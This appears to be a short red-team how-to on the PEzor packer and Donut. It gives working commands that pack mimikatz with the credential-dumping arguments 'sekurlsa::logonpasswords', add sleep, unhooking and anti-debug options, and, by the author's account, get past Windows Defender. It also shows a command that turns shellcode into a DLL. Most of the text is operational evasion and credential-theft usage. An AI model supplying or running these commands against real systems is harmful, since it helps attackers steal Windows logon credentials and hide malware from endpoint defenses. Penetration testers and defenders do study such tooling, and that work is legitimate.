PEzor Usage Examples

PEzor: https://github.com/phra/PEzor

Donut: https://github.com/TheWover/donut

PEzor is a great packer for windows PE files.

This can be used on something like the mimikatz binary from github, and packed to help bypass EDR and AV tools on a system.

The setup process can be a hassle, however I created docker container which can be pulled from here: https://hub.docker.com/r/nahid5/pezor

Basic Usage EXE

How PEzor work is like this: PEzor.sh <PEzor options> <Location to Exe> <Donut args>

The donut args is where you can put the arguments needed for the executable. With PEzor you can’t add args to the executable after it’s generated. So make sure to add the arguments using donut. If you need one binary to do multiple things, then you will need to make a binary for each command.

Start binary with a simple delay

Even a simple delay can be used to help bypass EDR detection

PEzor.sh -64 -unhook -antidebug -text -self -sleep=10000 /home/kali/Documents/mimikatz.exe -z 2 -p 'privilege::debug sekurlsa::logonpasswords exit'

The -sleep above will sleep for 10 seconds. The docs are wrong in stating the -sleep is seconds, it’s actually milliseconds. I tested this vs windows defender, and it successfully bypassed defender’s detection.

Note, the -64 is added since the binary is a 64 bit binary. Always try to be as explicit as possible.

Shellcode to DLL

If you would like to conver shellcode to dll, you can do something like this:

PEzor.sh -64 -format=dll -shellcode /location/to/shellcode.bin